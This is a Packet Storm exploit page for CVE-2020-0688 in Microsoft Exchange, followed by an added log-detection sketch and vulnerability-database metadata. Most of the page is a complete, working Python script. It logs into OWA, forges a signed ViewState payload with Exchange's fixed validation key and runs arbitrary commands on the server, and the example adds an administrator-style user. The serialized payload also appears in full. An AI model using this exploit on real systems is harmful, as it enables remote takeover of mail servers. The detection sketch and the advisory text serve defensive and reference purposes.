Microsoft Exchange 2019 15.2.221.12 Remote Code Execution
2020-03-02T00:00:00
ID PACKETSTORM:156592 Type packetstorm Reporter Photubias Modified 2020-03-02T00:00:00
Description
`# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
# Date: 2020-02-28
# Exploit Author: Photubias
# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2010 SP3 up to 2019 CU4
# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019
# CVE: CVE-2020-0688
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright 2020 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name CVE-2020-0688-Photubias.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
This is a native implementation without requirements, written in Python 2.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net
Example Output:
CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c "net user pwned pwned /add"
[+] Login worked
[+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570
[+] Detected OWA version number 15.2.221.12
[+] Vulnerable View State "B97B4E27" detected, this host is vulnerable!
[+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:
[+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==
Sending now ...
'''
import urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass
## STATIC STRINGS
# This string acts as a template for the serialization (contains "###payload###" to be replaced and TWO size locations)
strSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')
# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)
strSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')
def convertInt(iInput, length):
    # Little-endian hex string of the integer, truncated to `length` hex characters
    return struct.pack("<I" , int(iInput)).encode('hex')[:length]

def getYsoserialPayload(sCommand, sSessionId):
    ## PART1 of the payload to hash
    strPart1 = strSerTemplate.replace('###payload###', sCommand)
    ## Fix the length fields
    #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))
    #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))
    strLength1 = convertInt(0x06b8 + len(sCommand),4)
    strLength2 = convertInt(0x04da + len(sCommand),4)
    strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]
    strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]

    ## PART2 of the payload to hash
    strPart2 = '274e7bb9'
    for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'
    strPart2 = binascii.unhexlify(strPart2)

    strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()
    strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))
    return strResult

def verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):
    if not sTarget[-1:] == '/': sTarget += '/'
    ## Verify Login
    lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}
    try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()
    except: print('[!] Error, ' + sTarget + ' not reachable')
    bLoggedIn = False
    for cookie in oCookjar:
        if cookie.name == 'cadata': bLoggedIn = True
    if not bLoggedIn:
        print('[-] Login Wrong, too bad')
        exit(1)
    print('[+] Login worked')

    ## Verify Session ID
    sSessionId = ''
    sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()
    for cookie in oCookjar:
        if 'SessionId' in cookie.name: sSessionId = cookie.value
    print('[+] Got ASP.NET Session ID: ' + sSessionId)

    ## Verify OWA Version
    sVersion = ''
    try: sVersion = sResult.split('stylesheet')[0].split('href="')[1].split('/')[2]
    except: sVersion = 'favicon'
    if 'favicon' in sVersion:
        print('[*] Problem, this user has never logged in before (wizard detected)')
        print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')
        exit(1)
    print('[+] Detected OWA version number '+sVersion)

    ## Verify ViewStateValue
    sViewState = ''
    try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value="')[1].split('"')[0]
    except: pass
    if sViewState == 'B97B4E27':
        print('[+] Vulnerable View State "B97B4E27" detected, this host is vulnerable!')
    else:
        print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)
        ans = raw_input('[?] Still want to try the exploit? [y/N]: ')
        if ans == '' or ans.lower() == 'n': exit(1)
    return sSessionId, sTarget, sViewState

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')
    parser.add_argument('-u', '--username', help='Username (e.g. joe or joe@contoso.com)', default='')
    parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')
    parser.add_argument('-c', '--command', help='Command to put behind "cmd /c " (e.g. net user pwned pwned /add)', default='')
    args = parser.parse_args()
    if args.target == '' or args.username == '' or args.command == '':
        print('[!] Example usage: ')
        print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c "net user pwned pwned /add"')
    else:
        if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')
        else: sPassword = args.password
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        oCookjar = cookielib.CookieJar()
        #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})
        #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)
        oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))
        sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)
        ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')
        if ans.lower() == 'n': exit(0)
        sPayLoad = getYsoserialPayload(args.command, sSessionId)
        print('[+] Got Payload: ' + sPayLoad)
        sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)
        print(' Sending now ...')
        try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))
        except urllib2.HTTPError, e:
            # e.code is an integer, so compare against 500 rather than the string '500'
            if e.code == 500: print('[+] This probably worked (Error Code 500 received)')

if __name__ == "__main__":
    main()
`
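For defenders, the request this script sends has a recognisable shape: a GET to `ecp/default.aspx` carrying `__VIEWSTATE` in the query string, whose decoded value starts with the bytes `ff 01 32` (the `/wEy` prefix visible above). The following detection sketch is an added example, not part of the original advisory or the author's script; it is written in Python 3, and the IIS W3C field layout, the function names and the sample log lines are assumptions constructed for the demonstration.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote_plus

# ObjectStateFormatter header of the page's payload ("/wEy" in base64): 0xFF 0x01
# marker bytes, then token 0x32, which introduces a BinaryFormatter-serialized object.
BINARY_SERIALIZED_HEADER = b"\xff\x01\x32"
ECP_PAGE = "/ecp/default.aspx"  # request path used by the script on this page


def iter_w3c_records(lines):
    """Yield one dict per IIS W3C log entry, following the active #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def decode_viewstate(value):
    """Base64-decode a __VIEWSTATE value; return None when it is not valid base64."""
    value = value.replace(" ", "+")   # parse_qs turns an unencoded '+' into a space
    value += "=" * (-len(value) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify(record):
    """Return a finding dict for a suspicious record, or None when it is not relevant."""
    if record.get("cs-method", "").upper() != "GET":
        return None
    if record.get("cs-uri-stem", "").lower() != ECP_PAGE:
        return None
    parsed = parse_qs(record.get("cs-uri-query", ""), keep_blank_values=True)
    query = {key.upper(): vals for key, vals in parsed.items()}  # ignore key case
    if "__VIEWSTATE" not in query:
        return None
    severity = "medium"
    reasons = ["__VIEWSTATE passed in the query string of a GET to " + ECP_PAGE]
    blob = decode_viewstate(query["__VIEWSTATE"][0])
    if blob is None:
        reasons.append("value is not valid base64")
    elif blob.startswith(BINARY_SERIALIZED_HEADER):
        severity = "high"
        reasons.append("payload is a BinaryFormatter-serialized object (ff 01 32)")
    if record.get("sc-status") == "500":
        reasons.append("server answered 500")
    return {
        "severity": severity,
        "client": record.get("c-ip"),
        "user": record.get("cs-username"),
        "status": record.get("sc-status"),
        "reasons": reasons,
    }


def scan(lines):
    """Run classify() over every parsed record and collect the findings in order."""
    return [f for f in map(classify, iter_w3c_records(lines)) if f]


def build_sample_log():
    """Constructed log lines (documentation IPs, inert filler bytes) for the demo."""
    def vs(raw):
        return quote_plus(base64.b64encode(raw).decode("ascii"))

    binary_blob = BINARY_SERIALIZED_HEADER + b"CONSTRUCTED-FILLER" + b"\x00" * 20
    other_blob = b"\xff\x01\x0f" + b"CONSTRUCTED-FILLER" + b"\x00" * 20
    prefix = "__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE="
    return [
        "#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username"
        " c-ip cs(User-Agent) sc-status",
        "2020-03-01 10:00:01 GET /ecp/default.aspx - user1 192.0.2.10 Mozilla/5.0 200",
        "2020-03-01 10:00:05 GET /ecp/default.aspx " + prefix + vs(binary_blob)
        + " user1 192.0.2.10 Python 500",
        "2020-03-01 10:00:09 POST /owa/auth.owa - - 192.0.2.11 Mozilla/5.0 302",
        "2020-03-01 10:00:12 GET /ecp/default.aspx " + prefix + vs(other_blob)
        + " user2 192.0.2.12 Mozilla/5.0 200",
        "2020-03-01 10:00:15 GET /ecp/default.aspx __viewstate=" + quote_plus("not*base64")
        + " user3 192.0.2.13 Mozilla/5.0 200",
    ]


if __name__ == "__main__":
    for finding in scan(build_sample_log()):
        print(finding["severity"], finding["client"], finding["user"],
              "; ".join(finding["reasons"]))
```

The `high` finding also carries the authenticated user name from `cs-username`, which identifies the account whose credentials need to be reset, since the attack requires a valid login.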
{"id": "PACKETSTORM:156592", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Exchange 2019 15.2.221.12 Remote Code Execution", "description": "", "published": "2020-03-02T00:00:00", "modified": "2020-03-02T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/156592/Microsoft-Exchange-2019-15.2.221.12-Remote-Code-Execution.html", "reporter": "Photubias", "references": [], "cvelist": ["CVE-2020-0688"], "lastseen": "2020-03-04T15:06:30", "viewCount": 149, "sourceHref": "https://packetstormsecurity.com/files/download/156592/msexchange2019-exec.txt"}
{"cve": [{"lastseen": "2021-02-02T07:36:54", "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.", "edition": 8, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-11T22:15:00", "title": "CVE-2020-0688", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-02-20T17:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2010", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2020-0688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0688", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_14:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", 
"cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_4:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2010:sp3_rollup_30:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_15:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:53:46", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka \u2018Microsoft Exchange Memory Corruption Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 26, 2020 5:02pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. 
This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4**hartescout** at February 26, 2020 2:30am UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**J3rryBl4nks** at March 02, 2020 10:11pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. 
The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**theguly** at February 28, 2020 4:45pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in grate detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. 
This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n\n**xFreed0m** at March 10, 2020 2:34pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. 
The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n\n**todb-r7** at April 09, 2020 2:08pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n\n**ccondon-r7** at March 06, 2020 11:31pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. 
The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**tsellers-r7** at March 05, 2020 10:29pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. 
This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**gwillcox-r7** at October 20, 2020 6:47pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. 
The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. This introduces size restrictions on the OS command that can be executed.\n\n**jbarto** at February 28, 2020 4:51pm UTC reported:\n\nThis is a serialization bug in the Exchange Control Panel component of the Microsoft Exchange server. The [write up](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) by ZDI outlines an exploitation path in great detail how the vulnerability would be leveraged to gain command execution as `NT_AUTHORITY\\SYSTEM` on the server.\n\nThe root of the issue is that the `validationKey` is not randomized at installation time, resulting in Exchange servers using an attacker known value. This value can be used to submit crafted data to the server that passes validation checks and is ultimately deserialized which can result in code execution.\n\nThe important values from the write up are:\n \n \n validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF\n validationalg = SHA1\n \n\nI anticipate that the largest barrier to developing a PoC for this will be setting up and configuring a target environment. Exploiting this vulnerability requires authenticating as a user. The user must be a member of the `Domain Users` group and have a configured mailbox in Exchange.\n\nThe ViewState must be transferred within a GET request, POST can not be used. 
